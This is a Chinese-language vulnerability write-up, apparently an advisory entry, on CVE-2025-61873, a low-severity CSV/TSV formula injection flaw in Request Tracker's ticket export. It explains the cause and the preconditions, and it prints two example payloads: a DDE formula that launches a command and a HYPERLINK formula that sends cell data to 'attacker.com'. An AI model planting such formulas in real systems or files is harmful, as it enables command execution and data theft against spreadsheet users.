CVE-2025-61873CVE-2025-61873是Best Practical公司开发的Request Tracker(RT)工单管理系统中的一个CSV注入漏洞。该漏洞存在于RT 4.4.9之前、5.0.9之前和6.0.2之前的所有版本。攻击者可以通过在工单值(ticket values)中注入恶意公式(如以等号开头的公式),当管理员或其他用户使用TSV(制表符分隔值)格式导出工单数据时,恶意公式会被写入到导出的CSV文件中。受害者在Microsoft Excel或其他电子表格软件中打开该文件时,注入的公式可能会被执行,从而导致数据泄露、公式注入攻击或进一步的恶意操作。此漏洞需要攻击者具有创建或修改工单的权限,且需要管理员进行TSV导出操作才能触发。CVSS 3.1评分仅为2.6,属于低危级别,主要影响完整性和数据安全。
该漏洞的根本原因在于RT系统在处理工单数据导出时,未对用户输入的特殊字符和公式符号进行充分的输入验证和输出编码。当工单字段中包含以等号(=)、加号(+)或减号(-)开头的字符串时,这些内容在TSV导出时会被Excel等软件识别为公式。在CSV/TSV格式中,以等号开头的文本会被电子表格软件自动解析为公式执行。攻击者可以在工单的任意文本字段(如主题、描述、自定义字段等)中插入恶意公式,例如:=cmd|' /C calc'!A0 或 =HYPERLINK("http://attacker.com/steal?data="&A1) 。当导出的TSV文件被用Excel打开时,第一个公式会被自动执行,可能导致命令执行或数据外传。由于RT系统通常用于企业内部流程管理,导出的工单数据可能包含敏感信息,因此该漏洞可被用于情报收集和数据窃取。漏洞利用的关键条件是:1) 攻击者需要能够创建或编辑工单;2) 需要有权限的用户执行TSV导出操作;3) 导出的文件需要在支持公式解析的电子表格软件中打开。